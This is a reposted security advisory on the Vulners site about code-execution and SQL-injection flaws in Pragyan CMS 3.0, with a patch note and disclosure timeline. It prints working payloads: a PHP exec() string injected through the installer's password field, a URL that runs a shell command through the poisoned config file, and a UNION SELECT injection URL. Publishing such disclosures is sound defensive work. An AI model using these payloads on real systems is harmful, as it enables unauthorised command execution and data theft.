Vulners
Lucene search
Pragyan CMS v 3.0 mutiple Vulnerabilities
#Pragyan CMS v 3.0 mutiple Vulnerabilities
#Author Villy and Abhishek Lyall - villys777[at]gmail[dot]com, abhilyall[at]gmail[dot]com
#Web - http://www.aslitsecurity.com/
#Blog - http://bugix-security.blogspot.com
#http://www.aslitsecurity.blogspot.com/
#Pragyan CMS v 3.0
Technical Description
1) Code execution in INSTALL/install.php
script not correctly validate entered fields.
possibility to write at password field string:
");echo exec($_GET["a"]);echo ("
or in another fields with turned of javascript.
in cms/config.inc.php will be code:
define("MYSQL_PASSWORD","");echo exec($_GET["a"]);echo ("");
which allows command execution.
EXPLOIT:: http://target.com/blog/cms/config.inc.php?a=ls -la
2) sql injection
- get mysql version EXPLOIT::
http://target.com/path/+view&thread_id=-1 UNION ALL SELECT null,null,null,null,concat(unhex(Hex(cast(@@version as char)))),null,null,null--
Solution
update to Pragyan CMS 3.0 rev.274
Changelog
2011-19-02 : Initial release
2011-20-02 : Reported to vendor
2011-25-02 : patch released
2011-25-02 : public disclose
Credits
Villy
Abhishek Lyall
pragyan.org
http://bugix-security.blogspot.com
http://www.aslitsecurity.blogspot.com/
# 0day.today [2018-04-05] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Feb 2011 00:00Current
7.1High risk
Vulners AI Score7.1